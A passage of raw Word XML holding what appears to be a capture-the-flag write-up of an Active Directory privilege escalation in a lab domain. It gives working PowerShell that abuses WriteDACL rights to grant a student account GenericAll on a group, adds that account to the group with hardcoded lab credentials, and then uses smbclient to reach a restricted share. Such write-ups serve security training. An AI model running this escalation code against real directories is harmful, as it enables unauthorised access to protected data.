      </w:r>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>enter-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>pssession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remote_elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account from my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session on grades.elfu.org. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0326F033" w14:textId="476AF713" w:rsidR="00144582" w:rsidRDefault="00144582" w:rsidP="0053096A">
      <w:r>
        <w:t xml:space="preserve">Once accessing the domain controller and having access to the proper libraries to modify the AD objects’ rights, the first step was to grant my student account “generic all” permissions on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>researchdepartment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> group so that I could then add myself to that group</w:t>
      </w:r>
      <w:r w:rsidR="00A76E62">
        <w:t xml:space="preserve">. Since this requires distinguished names, I used </w:t>
      </w:r>
      <w:r w:rsidR="00A76E62" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A76E62" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>adgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A76E62">
        <w:t xml:space="preserve"> to confirm the input for “</w:t>
      </w:r>
      <w:r w:rsidR="00A76E62" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A76E62" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ldapConnString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A76E62">
        <w:t>” in the following code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352681E9" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Add-Type -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AssemblyName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.DirectoryServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21529845" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldapConnString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "LDAP://CN=Research </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Department,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Users,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A8539F" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$username = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvfffnnpkr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9D02AE" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nullGUID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]'00000000-0000-0000-0000-000000000000'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7CBA3B" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>propGUID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]'00000000-0000-0000-0000-000000000000'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72014E5C" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IdentityReference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372812F6" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inheritanceType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C44CE" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ACE = New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.DirectoryServices.ActiveDirectoryAccessRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ($IdentityReference,([System.DirectoryServices.ActiveDirectoryRights] "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"),([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.Security.AccessControl.AccessControlType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] "Allow"),$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>propGUID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inheritanceType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nullGUID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9859B8" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainDirEntry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.DirectoryServices.DirectoryEntry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldapConnString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02B6BB3E" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>secOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainDirEntry.get_Options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3739F35E" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>secOptions.SecurityMasks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.DirectoryServices.SecurityMasks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dacl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="453A3FAE" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainDirEntry.RefreshCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A9E195" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainDirEntry.get_ObjectSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AddAccessRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($ACE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3FF622" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainDirEntry.CommitChanges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D956E90" w14:textId="1C80C34E" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainDirEntry.dispose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D140A9" w14:textId="00AA4527" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00A76E62"/>
    <w:p w14:paraId="1F2B8DA9" w14:textId="0B4CDE50" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00A76E62">
      <w:r>
        <w:t xml:space="preserve">Once complete, we have to switch contexts from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remote_elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>writedacl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access</w:t>
      </w:r>
      <w:r w:rsidR="00C60537">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the student account that now has full access to add new group members. Native tools, like </w:t>
      </w:r>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>add-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>adgroupmember</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, will not work. The following code can be run from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remote_elf’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C60537">
        <w:t>psession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> due to the explicit credentials defined in the connection. This will add the student account to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>researchdepartment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> group:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D74CA6B" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Add-Type -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AssemblyName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.DirectoryServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24861B0D" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldapConnString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "LDAP://CN=Research </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Department,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Users,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C893B2" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$username = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvfffnnpkr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D6E290" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$password = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Uxoglgtft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>@"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BE926A" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainDirEntry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.DirectoryServices.DirectoryEntry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldapConnString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, $username, $password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1403E020" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$user = New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.Security.Principal.NTAccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\$username")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B9E996" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user.Translate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.Security.Principal.SecurityIdentifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E432803" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$b=New-Object byte[] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sid.BinaryLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3162D322" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sid.GetBinaryForm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($b,0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374A833D" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexSID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BitConverter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ToString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($b).Replace('-','')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4099845E" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainDirEntry.Add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("LDAP://&lt;SID=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexSID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C77CF61" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainDirEntry.CommitChanges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC39629" w14:textId="08679797" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainDirEntry.dispose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092F2FEF" w14:textId="724EA083" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00A76E62"/>
    <w:p w14:paraId="4D70C6BD" w14:textId="4C88C77E" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00A76E62">
      <w:r>
        <w:t>When that is successful, the student account can be used to access the share like so:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152182A" w14:textId="61B4E132" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> \\\\10.128.3.30\\research_dep -W </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -U </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvfffnnpkr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6575B861" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Enter ELFU.LOCAL\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvfffnnpkr's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702F591F" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Try "help" to get a list of possible commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637AEC13" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: \&gt; ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBF91CE" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  .                                   D        0  Thu Dec  2 16:39:42 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3949842C" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ..                                  D        0  Wed Dec 22 08:01:33 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54605B08" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  SantaSecretToAWonderfulHolidaySeason.pdf      N   173932  Thu Dec  2 16:38:26 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9133F3" w14:textId="77777777" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365A17C6" w14:textId="4197F386" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                41089256 blocks of size 1024. 34791904 blocks available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D662FD2" w14:textId="54458AD1" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00A76E62"/>
